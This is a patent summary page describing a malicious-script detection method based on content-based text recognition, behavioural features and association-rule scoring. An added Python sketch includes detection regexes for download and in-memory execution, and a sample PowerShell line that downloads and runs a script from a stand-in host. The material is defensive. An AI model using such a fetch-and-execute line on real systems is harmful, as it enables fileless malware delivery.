A malicious script detection method, device and storage medium

A malicious script detection method, applied in the field of network security, addresses three problems: malicious scripts cannot be correctly detected and removed, sandboxes and similar devices cannot effectively identify them, and their file format is difficult to identify. The method defeats forged file suffixes, makes verdicts easier to explain, and reduces false positives.

Active Publication Date: 2022-06-21
SANGFOR TECH INC

AI Technical Summary

Problems solved by technology

[0008] 2. Most malicious scripts have forged suffixes, which makes their file format difficult to identify, so sandboxes and similar devices cannot effectively recognize them.
[0009] 3. Most downloader-type malicious scripts pull malware from the Internet and execute it in memory. The parent malware body is never saved to the victim's disk, so even when anti-virus software is installed it cannot correctly detect and remove it (a typical fileless attack).

Examples

Embodiment Construction

[0081] The technical solutions in the embodiments of the present invention will be clearly and completely described below with reference to the accompanying drawings in the embodiments of the present invention.

[0082] As shown in Figure 1, the embodiment of the present application provides a malicious script detection method, including:

[0083] S101. Obtain a file to be detected.

[0084] The malicious script detection method in the embodiment of the present application can be applied to a host device or a mobile device (a malicious script detection device). Malicious script files can be monitored by acquiring the files to be detected that are saved on or received by the host device or mobile device.

[0085] The files to be detected mainly include files downloaded by the host device or mobile device via the Web, files transferred over FTP or over SMB on the intranet, and Office macro script files that may be present in email attachments.

[0086] S102. Perform t...

Abstract

The embodiment of the present invention discloses a malicious script detection method, device and storage medium, comprising: obtaining a file to be detected; performing text recognition on the file to be detected to obtain a text to be detected; detecting whether at least one specific behavioral feature is present; if so, performing association rule mining on the at least one specific behavioral feature and determining an associated behavioral feature combination that satisfies a preset condition, the preset condition being the minimum support and minimum confidence (credibility) of the behavioral feature combination; obtaining the scoring result corresponding to the associated behavioral feature combination; and judging, based on the scoring result, whether the file to be detected is a malicious script. Text recognition of the file to be detected defeats malicious scripts that forge their suffix, and association analysis of the file's behavioral features makes the malicious-script verdict easier to interpret and reduces false positives.
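The pipeline described in the abstract (content-based text recognition, behavioral feature detection, association rules filtered by minimum support and minimum confidence, then scoring) can be sketched as follows. This is an added example, not code from the patent: the feature names, regexes, reference corpus, thresholds and scoring formula are all assumptions made for illustration.

```python
import re
from itertools import permutations

# Hypothetical behaviour features; names and patterns are assumptions.
FEATURES = {
    "download": re.compile(r"DownloadString|URLDownloadToFile|XMLHTTP", re.I),
    "mem_exec": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "encoded": re.compile(r"FromBase64String|-EncodedCommand", re.I),
    "hidden": re.compile(r"-WindowStyle\s+Hidden", re.I),
}
# Constructed reference corpus: feature sets of previously labelled malicious scripts.
CORPUS = [
    {"download", "mem_exec"}, {"download", "mem_exec", "hidden"},
    {"download", "mem_exec", "encoded"}, {"encoded", "hidden"}, {"download"},
]
# Constructed sample: script content that might arrive under any suffix, e.g. ".jpg".
SAMPLE = b"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"

def to_text(data: bytes):
    """Recognise text by content, never by suffix; None means binary data."""
    bom = data[:2] in (b"\xff\xfe", b"\xfe\xff")
    if not bom and b"\x00" in data:
        return None
    try:
        return data.decode("utf-16" if bom else "utf-8")
    except UnicodeDecodeError:
        return None

def mine_rules(corpus, min_sup=0.4, min_conf=0.7):
    """Directed rules a -> b that meet minimum support and minimum confidence."""
    rules, n = {}, len(corpus)
    for a, b in permutations(sorted(set().union(*corpus)), 2):
        n_a = sum(a in t for t in corpus)
        n_ab = sum(a in t and b in t for t in corpus)
        if n_ab / n >= min_sup and n_ab / n_a >= min_conf:
            rules[(a, b)] = n_ab / n_a
    return rules

def classify(data: bytes, rules, threshold=70):
    """Return (verdict, score, matched rules) so the verdict can be explained."""
    text = to_text(data)
    if text is None:
        return ("not_script", 0, [])
    found = {name for name, rx in FEATURES.items() if rx.search(text)}
    hits = [r for r in rules if set(r) <= found]
    score = round(100 * max((rules[r] for r in hits), default=0))
    return ("malicious" if score >= threshold else "clean", score, sorted(hits))
```

The matched rules returned with the score are what make the verdict explainable: a single feature such as a download call scores zero on its own, and only a mined combination raises the score.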

Description

Technical field

[0001] The invention relates to the technical field of network security, in particular to a malicious script detection method, device and storage medium.

Background

[0002] As anti-virus technology has matured, traditional PE viruses find it increasingly difficult to penetrate host networks and are often blocked by gateway security devices such as AF and WAF. More and more network attacks therefore use malicious scripts to evade detection (bypass): most security products lack the ability to inspect plain-text files and often adopt a pass-through policy, which makes it possible for such scripts to invade user hosts.

[0003] The existing technology mainly adopts the following methods to prevent such attacks:

[0004] 1. Deploy firewalls, virus gateways, sandboxes and other equipment at the network exit to monitor incoming traffic and remove threats from it.

[0005] 2. Install anti-virus software on the terminal machine for overall monito...

Application Information

Patent Type & Authority: Patents (China)
IPC: IPC(8): H04L9/40
CPC: H04L63/145, H04L63/1408, H04L63/1416
Inventor: 杨玉华, 蒲大峰
Owner: SANGFOR TECH INC